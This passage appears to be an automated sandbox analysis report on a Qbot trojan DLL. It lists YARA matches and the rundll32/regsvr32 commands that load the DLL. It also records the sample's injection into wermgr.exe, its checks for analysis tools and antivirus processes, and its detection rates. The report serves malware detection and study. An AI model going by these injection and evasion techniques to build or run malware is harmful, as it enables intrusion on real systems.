          Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA904A00_2_6DA904A0
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA9CC860_2_6DA9CC86
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA95CF60_2_6DA95CF6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA979090_2_6DA97909
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA948FC0_2_6DA948FC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA8F07E0_2_6DA8F07E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA8B2000_2_6DA8B200
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007435EE3_2_007435EE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007429E93_2_007429E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007482A03_2_007482A0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0074676F3_2_0074676F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007463B03_2_007463B0
          Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DA81730 appears 87 times
          Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DA89CA0 appears 41 times
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,3_2_0073D538
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,3_2_0073D9DE
          Source: diatomaceous.dat.dll.7.drStatic PE information: No import functions for PE file found
          Source: diatomaceous.dat.dllBinary or memory string: OriginalFilenamegfngfhn sgedrl;fkweklnmgdfw8 vs diatomaceous.dat.dll
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\diatomaceous.dat.dll F892742F6C64A8991337FADDF84FBDB25C43022AC85C8BCC30D47FEBAFEA1D87
          Source: diatomaceous.dat.dll.7.drStatic PE information: Data appended to the last section found
          Source: diatomaceous.dat.dllReversingLabs: Detection: 73%
          Source: diatomaceous.dat.dllVirustotal: Detection: 77%
          Source: diatomaceous.dat.dllMetadefender: Detection: 44%
          Source: diatomaceous.dat.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServerJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\BwkwuiJump to behavior
          Source: classification engineClassification label: mal96.troj.evad.winDLL@18/1@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073E485 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,3_2_0073E485
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073BAF6 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,3_2_0073BAF6
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{8BD38B93-62A1-471F-A5AB-B91B963BC96D}
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{6A583BDA-7359-43D4-819F-474F9705BF6E}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6A583BDA-7359-43D4-819F-474F9705BF6E}
          Source: diatomaceous.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: y'E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: diatomaceous.dat.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: diatomaceous.dat.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: diatomaceous.dat.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: diatomaceous.dat.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: diatomaceous.dat.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA89B9F push ecx; ret 0_2_6DA89BB2
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0074B066 push ebx; ret 3_2_0074B067
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0074ADB4 push cs; iretd 3_2_0074AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0074AEB6 push cs; iretd 3_2_0074AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0074CB95 push esi; iretd 3_2_0074CB9A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073EF38 LoadLibraryA,GetProcAddress,3_2_0073EF38
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
          Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\Desktop\diatomaceous.dat.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5020 base: 1173C50 value: E9 42 26 E9 FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4768 base: 1173C50 value: E9 42 26 C9 FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4860 base: 1173C50 value: E9 42 26 C9 FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEJ
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXEM
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXEM
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXER
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXEL
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEK
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
          Source: wermgr.exe, 00000007.00000003.601336347.0000000004E12000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.601238980.0000000004E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROC_ANALYZER.EXE
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5068Thread sleep count: 134 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 476Thread sleep count: 113 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 64Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5188Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5220Thread sleep time: -83000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5016Thread sleep count: 47 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 2100Thread sleep count: 45 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-14365
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wermgr.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-11539
          Source: C:\Windows\System32\loaddll32.exeAPI coverage: 6.6 %
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073DDE7 GetSystemInfo,3_2_0073DDE7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA994B5 FindFirstFileExW,0_2_6DA994B5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073C123 FindFirstFileW,FindNextFileW,3_2_0073C123
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA89EC6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DA89EC6
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073EF38 LoadLibraryA,GetProcAddress,3_2_0073EF38
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA9A32E GetProcessHeap,0_2_6DA9A32E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA91610 mov ecx, dword ptr fs:[00000030h]0_2_6DA91610
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA99229 mov eax, dword ptr fs:[00000030h]0_2_6DA99229
          Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA89EC6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DA89EC6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA8A11D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6DA8A11D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA8D8C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DA8D8C3

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1030000Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1173C50Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: BF0000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1173C50Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: BE0000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1173C50Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 1030000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: BF0000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: BE0000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6DA9BFAE
          Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6DA9C73D
          Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6DA9C614
          Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6DA9C1A9
          Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6DA9C912
          Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6DA96812
          Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6DA9C843
          Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_6DA9C3C1
          Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6DA9C336
          Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6DA96349
          Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6DA9C29B
          Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6DA9C250
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA89CE5 cpuid 0_2_6DA89CE5
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA89FEC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6DA89FEC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073DFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,3_2_0073DFC2
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
